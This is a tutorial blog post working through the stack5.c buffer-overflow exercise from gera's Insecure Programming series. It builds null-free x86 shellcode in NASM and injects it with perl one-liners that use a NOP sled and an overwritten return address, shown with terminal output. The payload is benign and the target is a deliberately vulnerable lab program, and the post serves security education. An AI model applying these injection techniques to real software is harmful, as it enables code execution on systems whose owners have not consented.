Introduction
Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.
/* stack5-stdin.c *
* specially crafted to feed your brain by gera */
#include <stdio.h>
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x000d0a00)
printf("you loose!\n");
}
So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?
The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.
Epic Sploits
It’s worth mentioning that these programs are purposely designed to be exploited. And the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no experience in this line of work professionally, it cannot all be this straight forward. If you want an example of something truly advanced, explained so even I can grasp the basics, I’d go check out Thomas Ptacek’s write up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.
So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.
Shellc0dage
There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are very many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation‘s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.
Abstractions of Abstractions
NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.
So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls. Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and return. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.
NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is valid, because they are used two completely different ways, and are even parts of a different set of standards each. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down as all do at some point.
The next layer up is kernel system calls. System calls are convenient pointers to groups of assembly instructions (implemented as a system library typically in /lib) that “do stuff” with the given arguments, but they are not inherent to the x86 processor, rather they are inherent to the kerneland operating system that you are using at the time. They invariably are implemented in assembly (I suppose everything is, eventually), and their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls at all (except through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.
The final and highest layer of abstraction we’ll deal with is the C standard library functions, implemented through the various header files located typically in /usr/include on your average Linux distribution. The C standard library is defined through an ISO standard, and each operating system that wants to use C capabilities past what the compiler provides (as an interface to assembly instructions for allocating and managing memory) in a way consistent with other operating systems or kernels needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C, and implemented in libc, accessible to all processes at a predictable location in memory.
Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on, in the meantime if you want to do some extracurricular reading, I would say a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago, it’s a bit above my head but it will serve you well if you ever need to look something up…ever. If you want a more gentle introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike, I read this book and really liked it.
Enough Edumacation, Let’s Break Shit
Now I’m going to briefly outline how to build the shellcode we’re going to use, and then again briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. This is not super important for the gets() function, but if you are using something like strcpy() in the future or something else null terminated to get your shellcode into memory it will prematurely terminate the function.
We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.
Assembly code can be written using mnemonics, which are basically English-like direct correlations to a one-byte number that is the actual machine language that the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free version called the Netwide Assembler.
section .data ; data segment msg db "you win!", 0x0a, 0x0d ; the string to print with newline at the end section .text ; text segment, where the code is global _start ; default entry point for ELF linking _start: ; SYSCALL: ssize_t write(int fd, const void *buf, size_t count); ; Our syscall: write(1, msg, 10) mov eax, 4 ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h) mov ebx, 1 ; put 1 into EBX, since file descriptor we want is STDOUT mov ecx, msg ; Put the address of the string pointer into ECX, since it's what we want to print mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with crlf at the end) int 0x80 ; tell the kernel to do a syscall ; SYSCALL: void _exit(int status); ; Our syscall: exit(0) meaning that there were no problems mov eax, 1 ; put 1 into EAX since exit() is syscall #1 mov ebx, 0 ; put 0 into EBX, since that's our one and only argument to exit() int 0x80 ; tell the kernel to do a syscall
The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm printyouwin.asm: ASCII English text hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.* -rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm -rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060 hacking@hacking-theart:~/InsecureProgramming $ file printyouwin printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin you win!
This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.
BITS 32 ; Tell nasm this is 32-bit code. call mark_below ; Call below the string to instructions db "you win!", 0x0a, 0x0d ; with newline and carriage return bytes. mark_below: ; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; Pop the return address (string ptr) into ecx. mov eax, 4 ; Write syscall #. mov ebx, 1 ; STDOUT file descriptor mov edx, 10 ; Length of the string int 0x80 ; Do syscall: write(1, string, 10) ; void _exit(int status); mov eax, 1 ; Exit syscall # mov ebx, 0 ; Status = 0 int 0x80 ; Do syscall: exit(0)
What this code does is uses a trick of the call instruction within assembly to place the next address following the call onto the stack, which immediately after the call is popped back off of the stack into the ECX register. That address is used as a pointer to the string that we want to print.
This code we’ll want to translate not the ELF format, but to raw machine instructions, since we want to inject this code into a running process. To do this, we’ll use nasm without any arguments concerning the format parameter, then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that, since we only have control of the 80 byte buffer we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.
hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1* printyouwin1: data printyouwin1.asm: ASCII English text printyouwin1.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1 -rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1 hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1 45 printyouwin1 hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1 00000000 e8 0a 00 00 00 79 6f 75 20 77 69 6e 21 0a 0d 59 |.....you win!..Y| 00000010 b8 04 00 00 00 bb 01 00 00 00 ba 0a 00 00 00 cd |................| 00000020 80 b8 01 00 00 00 bb 00 00 00 00 cd 80 |.............| 0000002d hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1 objdump: printyouwin1: File format not recognized hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1 00000000 E80A000000 call 0xf 00000005 796F jns 0x76 00000007 7520 jnz 0x29 00000009 7769 ja 0x74 0000000B 6E outsb 0000000C 210A and [edx],ecx 0000000E 0D59B80400 or eax,0x4b859 00000013 0000 add [eax],al 00000015 BB01000000 mov ebx,0x1 0000001A BA0A000000 mov edx,0xa 0000001F CD80 int 0x80 00000021 B801000000 mov eax,0x1 00000026 BB00000000 mov ebx,0x0 0000002B CD80 int 0x80
This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include newlines in our printed string, because they will prematurely terminate the gets() function. If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed down version of the shellcode, that uses various techniques such as high-and-low bytes of 16-bit registers, XORing registers against themselves to zero out 32-bit registers prior to instruction execution, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory using a two’s compliment memory address to avoid more null bytes. It also eliminates the 0x0a and 0x0d newline or carriage return bytes as they would kill the gets() function prematurely.
BITS 32 ; Tell nasm this is 32-bit code. jmp short one ; Jump down to a call at the end. two: ; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; Pop the return address (string ptr) into ecx. xor eax, eax ; Zero out full 32 bits of eax register. mov al, 4 ; Write syscall #4 to the low byte of eax. xor ebx, ebx ; Zero out ebx. inc ebx ; Increment ebx to 1, STDOUT file descriptor. xor edx, edx mov dl, 8 ; Length of the string int 0x80 ; Do syscall: write(1, string, 14) ; void _exit(int status); mov al, 1 ; Exit syscall #1, the top 3 bytes are still zeroed. dec ebx ; Decrement ebx back down to 0 for status = 0. int 0x80 ; Do syscall: exit(0) one: call two ; Call back upwards to avoid null bytes db "you win!" ; with no newline or carriage return bytes.
And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!
hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode* 4c8c79ca6379f417c750f1712fbb5652 stack5shellcode 0f2668754e312f90cef8dff7f6c90723 stack5shellcode.bytes 4c8c79ca6379f417c750f1712fbb5652 stack5shellcode.out bd6be6a87c2eee6e0fab27f13ba5853d stack5shellcode.s hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out 00000000 EB13 jmp short 0x15 00000002 59 pop ecx 00000003 31C0 xor eax,eax 00000005 B004 mov al,0x4 00000007 31DB xor ebx,ebx 00000009 43 inc ebx 0000000A 31D2 xor edx,edx 0000000C B208 mov dl,0x8 0000000E CD80 int 0x80 00000010 B001 mov al,0x1 00000012 4B dec ebx 00000013 CD80 int 0x80 00000015 E8E8FFFFFF call 0x2 0000001A 796F jns 0x8b 0000001C 7520 jnz 0x3e 0000001E 7769 ja 0x89 00000020 6E outsb 00000021 21 db 0x21 hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out 00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 08 cd 80 |..Y1...1.C1.....| 00000010 b0 01 4b cd 80 e8 e8 ff ff ff 79 6f 75 20 77 69 |..K.......you wi| 00000020 6e 21 |n!| 00000022 hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5 buf: bffff7b0 cookie: bffff80c you win!hacking@hacking-theart:~/InsecureProgramming $
I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.
root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5 buf: bffff780 cookie: bffff7dc you win!root@hacking-theart:/home/hacking/InsecureProgramming #
And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, it was pretty laborious, but I hope you didn’t find reading about it so. I used very many references through completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf
). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!
2 Trackbacks
[...] upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use [...]
[...] Insecure Programming by Example: shellcode & stack5.c December 2009 1 comment [...]